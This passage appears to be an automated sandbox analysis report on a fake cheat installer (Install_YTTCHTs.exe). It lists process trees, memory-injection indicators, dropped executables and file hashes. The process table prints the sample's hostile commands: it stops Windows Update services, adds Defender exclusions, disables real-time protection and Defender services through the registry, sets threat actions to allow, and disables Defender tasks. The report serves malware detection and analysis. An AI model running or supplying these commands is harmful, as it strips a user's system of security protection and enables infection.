(The 29 Install_YTTCHTs.exe entries above are recorded a second time in the same order, followed by the first five of them again, from SeCreateTokenPrivilege through SeMachineAccountPrivilege, for 64 IoCs in total.)
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
pid  process
4596  Install_YTTCHTs.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description  pid  process  target process  (entries, in the order recorded)
PID 2948 wrote to memory of 4596  2948  RUN.exe  Install_YTTCHTs.exe  (3 entries)
PID 4292 wrote to memory of 3640  4292  msiexec.exe  MsiExec.exe  (3 entries)
PID 4596 wrote to memory of 4660  4596  Install_YTTCHTs.exe  msiexec.exe  (3 entries)
PID 4292 wrote to memory of 2236  4292  msiexec.exe  MsiExec.exe  (3 entries)
PID 2236 wrote to memory of 1288  2236  MsiExec.exe  powershell.exe  (2 entries)
PID 1288 wrote to memory of 1864  1288  powershell.exe  cmd.exe  (2 entries)
PID 1864 wrote to memory of 2020  1864  cmd.exe  PING.EXE  (3 entries)
PID 1864 wrote to memory of 4176  1864  cmd.exe  PING.EXE  (3 entries)
PID 1864 wrote to memory of 4984  1864  cmd.exe  PING.EXE  (3 entries)
PID 1864 wrote to memory of 4836  1864  cmd.exe  PING.EXE  (3 entries)
PID 1864 wrote to memory of 1284  1864  cmd.exe  PING.EXE  (3 entries)
PID 1864 wrote to memory of 4768  1864  cmd.exe  PING.EXE  (3 entries)
PID 1864 wrote to memory of 2340  1864  cmd.exe  PING.EXE  (3 entries)
PID 4292 wrote to memory of 4764  4292  msiexec.exe  MsiExec.exe  (3 entries)
PID 1864 wrote to memory of 4712  1864  cmd.exe  PING.EXE  (3 entries)
PID 1864 wrote to memory of 196  1864  cmd.exe  PING.EXE  (3 entries)
PID 1864 wrote to memory of 3940  1864  cmd.exe  PING.EXE  (3 entries)
PID 1864 wrote to memory of 428  1864  cmd.exe  PING.EXE  (3 entries)
PID 1864 wrote to memory of 4744  1864  cmd.exe  PING.EXE  (3 entries)
PID 1864 wrote to memory of 2020  1864  cmd.exe  PING.EXE  (3 entries)
PID 1864 wrote to memory of 3728  1864  cmd.exe  PING.EXE  (3 entries)
PID 1864 wrote to memory of 5060  1864  cmd.exe  PING.EXE  (3 entries)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
| Level | PID | Image | Command line | Signatures |
|---|---|---|---|---|
| 1 | 3384 | `C:\Windows\Explorer.EXE` | `C:\Windows\Explorer.EXE` | |
| 2 | 2948 | `C:\Users\Admin\AppData\Local\Temp\RUN.exe` | `"C:\Users\Admin\AppData\Local\Temp\RUN.exe"` | Suspicious use of WriteProcessMemory |
| 3 | 4596 | `C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe` | `.\Install_YTTCHTs.exe` | Executes dropped EXE; Enumerates connected drives; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow; Suspicious use of WriteProcessMemory |
| 4 | 4660 | `C:\Windows\SysWOW64\msiexec.exe` | `"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1710551043 " ALLUSERS="1"` | |
| 2 | 3044 | `C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe` | `"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"` | Executes dropped EXE; Suspicious use of SetThreadContext |
| 3 | 4356 | `C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe` | `C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe` | Executes dropped EXE |
| 2 | 3016 | `C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe` | `"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"` | Executes dropped EXE; Suspicious use of SetThreadContext |
| 3 | 2328 | `C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe` | `C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe` | Executes dropped EXE; Modifies registry class; Suspicious behavior: GetForegroundWindowSpam |
| 4 | 5080 | `C:\Windows\SysWOW64\WScript.exe` | `"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b8b216e-be33-47f5-90c9-2ab93a85e4c3.vbs"` | |
| 4 | 1664 | `C:\Windows\SysWOW64\WScript.exe` | `"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d2090d71-974d-49fa-8cd0-1f8c91a75e56.vbs"` | |
| 2 | 4940 | `C:\Windows\System32\cmd.exe` | `C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc` | |
| 3 | 2528 | `C:\Windows\System32\sc.exe` | `sc stop UsoSvc` | Launches sc.exe |
| 3 | 4312 | `C:\Windows\System32\sc.exe` | `sc stop WaaSMedicSvc` | Launches sc.exe |
| 3 | 544 | `C:\Windows\System32\sc.exe` | `sc stop wuauserv` | Launches sc.exe |
| 3 | 192 | `C:\Windows\System32\sc.exe` | `sc stop bits` | Launches sc.exe |
| 3 | 1092 | `C:\Windows\System32\sc.exe` | `sc stop dosvc` | Launches sc.exe |
| 2 | 552 | `C:\Windows\System32\cmd.exe` | `C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0` | |
| 3 | 2336 | `C:\Windows\System32\powercfg.exe` | `powercfg /x -hibernate-timeout-ac 0` | |
| 3 | 4588 | `C:\Windows\System32\powercfg.exe` | `powercfg /x -hibernate-timeout-dc 0` | |
| 3 | 4428 | `C:\Windows\System32\powercfg.exe` | `powercfg /x -standby-timeout-ac 0` | |
| 3 | 416 | `C:\Windows\System32\powercfg.exe` | `powercfg /x -standby-timeout-dc 0` | |
| 2 | 4212 | `C:\Windows\System32\svchost.exe` | `C:\Windows\System32\svchost.exe` | Suspicious behavior: EnumeratesProcesses |
| 1 | 4292 | `C:\Windows\system32\msiexec.exe` | `C:\Windows\system32\msiexec.exe /V` | Enumerates connected drives; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory |
| 2 | 3640 | `C:\Windows\syswow64\MsiExec.exe` | `C:\Windows\syswow64\MsiExec.exe -Embedding 9400D43F3FEAD939D0493164D8F02F07 C` | Loads dropped DLL |
| 2 | 2236 | `C:\Windows\syswow64\MsiExec.exe` | `C:\Windows\syswow64\MsiExec.exe -Embedding B525301DA5EA43EE060767E075AFF99A` | Loads dropped DLL; Suspicious use of WriteProcessMemory |
| 3 | 1288 | `C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe` | `-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss532F.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi502E.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr502F.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr52FF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."` | Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory |
| 4 | 1864 | `C:\Windows\system32\cmd.exe` | `C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\progressgood.bat" "` | Suspicious use of WriteProcessMemory |
| 5 | 2020 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4176 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4984 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4836 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 1284 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4768 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | |
| 5 | 2340 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4712 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 196 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 3940 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 428 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4744 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 2020 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 3728 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 5060 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 1068 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 992 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4184 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4304 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 2404 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | |
| 5 | 4652 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 544 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | |
| 5 | 2480 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4132 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 5108 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 2360 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 2468 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 5068 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 404 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 3600 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 2328 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 2128 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4280 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4252 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4584 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 556 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 2360 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 560 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 3704 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 2200 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | |
| 5 | 4444 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4476 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4616 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 5116 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 1104 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 3460 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4604 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | |
| 5 | 4996 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 3204 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | |
| 5 | 4128 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | |
| 5 | 3568 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 1152 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 192 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 1344 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 2528 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4952 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4836 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 3620 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 3116 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 1108 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4476 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 3940 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 1652 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 2500 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4776 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 212 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 2808 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | |
| 5 | 3728 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 728 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 992 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 4476 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 2328 | `C:\Windows\SysWOW64\PING.EXE` | `ping 127.0.0.1 -n 2` | Runs ping.exe |
| 5 | 1372 | `C:\Windows\SysWOW64\timeout.exe` | `timeout /t 10 /nobreak` | Delays execution with timeout.exe |
| 3 | 4332 | `C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` | `-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssD2E3.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiD2D1.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrD2D2.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrD2D3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."` | Suspicious behavior: EnumeratesProcesses |
| 2 | 4764 | `C:\Windows\syswow64\MsiExec.exe` | `C:\Windows\syswow64\MsiExec.exe -Embedding ECC602834DEF073A8D1A51BCDDA0588F E Global\MSI0000` | Loads dropped DLL; Blocklisted process makes network request; Drops file in System32 directory; Modifies data under HKEY_USERS |
| 2 | 1308 | `C:\Windows\Installer\MSID293.tmp` | `"C:\Windows\Installer\MSID293.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"` | Executes dropped EXE |
| 3 | 5004 | `C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe` | `"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"` | Executes dropped EXE |
| 4 | 2464 | `C:\Windows\System32\cmd.exe` | `"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D491.tmp\D4A2.tmp\D4A3.bat C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"` | |
| 5 | 540 | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\Admin\Appdata\Local" -Force"` | Suspicious behavior: EnumeratesProcesses |
| 5 | 1752 | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"` | Suspicious behavior: EnumeratesProcesses |
| 5 | 32 | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"` | Suspicious behavior: EnumeratesProcesses |
| 5 | 1080 | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\Admin\Appdata\Local" -Force"` | Suspicious behavior: EnumeratesProcesses |
| 5 | 5096 | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"` | Suspicious behavior: EnumeratesProcesses |
| 5 | 4716 | `C:\Windows\system32\reg.exe` | `reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f` | Modifies Windows Defender Real-time Protection settings |
| 5 | 4424 | `C:\Windows\system32\reg.exe` | `reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f` | |
| 5 | 4724 | `C:\Windows\system32\reg.exe` | `reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f` | |
| 5 | 232 | `C:\Windows\system32\reg.exe` | `reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f` | |
| 5 | 96 | `C:\Windows\system32\reg.exe` | `reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f` | Modifies Windows Defender Real-time Protection settings |
| 5 | 3888 | `C:\Windows\system32\reg.exe` | `reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f` | Modifies Windows Defender Real-time Protection settings |
| 5 | 212 | `C:\Windows\system32\reg.exe` | `reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f` | Modifies Windows Defender Real-time Protection settings |
| 5 | 3432 | `C:\Windows\system32\reg.exe` | `reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f` | |
| 5 | 4712 | `C:\Windows\system32\reg.exe` | `reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f` | |
| 5 | 4700 | `C:\Windows\system32\reg.exe` | `reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f` | |
| 5 | 3324 | `C:\Windows\system32\reg.exe` | `reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f` | |
| 5 | 8 | `C:\Windows\system32\reg.exe` | `reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f` | |
| 5 | 2444 | `C:\Windows\system32\reg.exe` | `reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f` | Modifies registry class |
| 5 | 196 | `C:\Windows\system32\reg.exe` | `reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f` | Modifies registry class |
| 5 | 1528 | `C:\Windows\system32\reg.exe` | `reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f` | |
| 5 | 4756 | `C:\Windows\system32\reg.exe` | `reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f` | |
| 5 | 1960 | `C:\Windows\system32\reg.exe` | `reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f` | |
| 5 | 2104 | `C:\Windows\system32\reg.exe` | `reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f` | |
| 5 | 3204 | `C:\Windows\system32\reg.exe` | `reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f` | Modifies security service |
| 5 | 3728 | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"` | Suspicious behavior: EnumeratesProcesses |
| 5 | 2868 | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"` | Suspicious behavior: EnumeratesProcesses |
| 5 | 232 | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"` | Suspicious behavior: EnumeratesProcesses |
| 5 | 4544 | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"` | Suspicious behavior: EnumeratesProcesses |
| 5 | 4468 | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"` | Suspicious behavior: EnumeratesProcesses |
| 5 | 4784 | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"` | Suspicious behavior: EnumeratesProcesses |
| 5 | 4996 | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"` | |
| 5 | 1012 | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"` | |
| 5 | 1644 | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"` | |
| 5 | 4288 | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"` | |
| 5 | 428 | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"` | |
| 5 | 4416 | `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"` | |
| 5 | 4960 | `C:\Windows\system32\schtasks.exe` | `schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable` | |
| 5 | 1352 | `C:\Windows\system32\schtasks.exe` | `schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable` | |
| 5 | 4232 | `C:\Windows\system32\schtasks.exe` | `schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable` | |
| 5 | 2548 | `C:\Windows\system32\schtasks.exe` | `schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable` | |
| 5 | 1084 | `C:\Windows\system32\schtasks.exe` | `schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable` | |
| 2 | 1368 | `C:\Windows\Installer\MSI24F.tmp` | `"C:\Windows\Installer\MSI24F.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"` | Executes dropped EXE |
| 2 | 3928 | `C:\Windows\Installer\MSI250.tmp` | `"C:\Windows\Installer\MSI250.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"` | Executes dropped EXE |
| 2 | 4784 | `C:\Windows\Installer\MSI251.tmp` | `"C:\Windows\Installer\MSI251.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"` | Executes dropped EXE |
| 3 | 2896 | `C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe` | `"C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"` | Executes dropped EXE; Suspicious use of SetThreadContext |
| 4 | 4208 | `C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe` | `C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe` | Suspicious use of NtCreateUserProcessOtherParentProcess; Drops file in Drivers directory; Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses |
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
256KB
MD56f4f55c3d6689bbba6170152425c0af1
SHA1ff8843cf6f1bd2cbb5e0d47148f438187f4cd4c6
SHA256723a152111c99627121df838cdd483587cb597835961b05c5ce22f135ad2f28f
SHA5126ec4bc8a3299ad3bd033d3d72c5d5ccad3eea773d11fc603a6cf477304f223ce7cd2d568da092cc69d91bbab85aa3b609b03d7ff66e3d1791a2a4cd2d97e8323
-
Filesize
256KB
MD50e6bcca437f8db26c23aad3020e333ea
SHA19feb3ff5d33ecb53404920b4183223d8eb724e73
SHA2565e57136d97bfc46f48d673a682af6729e209dd70b402f83b34e118cfa18c2763
SHA512b317f3d0628c0a4644127911a0cf6dc001f449d2aff23f8c7ba418aa742f9e02f15a3de926798d97bab99fe80ed2872152c770a39467e29b1db94acd598344aa
-
Filesize
192KB
MD52ac4632046ec129b1619d6e982c6bee9
SHA1bcf55c943a467ff5fe309ca25e856fd534b7b081
SHA256b1802ae3e05db654968e07cc7771e269ef45a52b830d4dbb617c149bbc9810ab
SHA512a1b24ff9dc21413509614fd9581bc999aa6448b7b9bcadf55b473597c3a063039e0a2b600d690208cff416e113f6e8318866463156f2c226567bc21929e799a6
-
Filesize
2.3MB
MD5f759d9f3f35dda05908011fcaed1d018
SHA10a7852907851700f7424094b7658d78743559dae
SHA2561780f4481aae5bc51fb79a42d92946ade0c5459efd99daa67bf2d1dcae275919
SHA5126cb7ab0ac9cb17d194b2a635dab9e5934d36623be7c126785cd83e1d98fe55a262068bc2676fd1499a07a1160005aff7d6199e9be544fad4581debcddf1b0390
-
Filesize
192KB
MD5194bb78e07935f96df77e7c83a0a6cb4
SHA1d445db61c505dad661a0652a5b81e5c676feb612
SHA256767e225832e7af1c8bac29ff889ece6834e5064f880dbd431bd531c33e635658
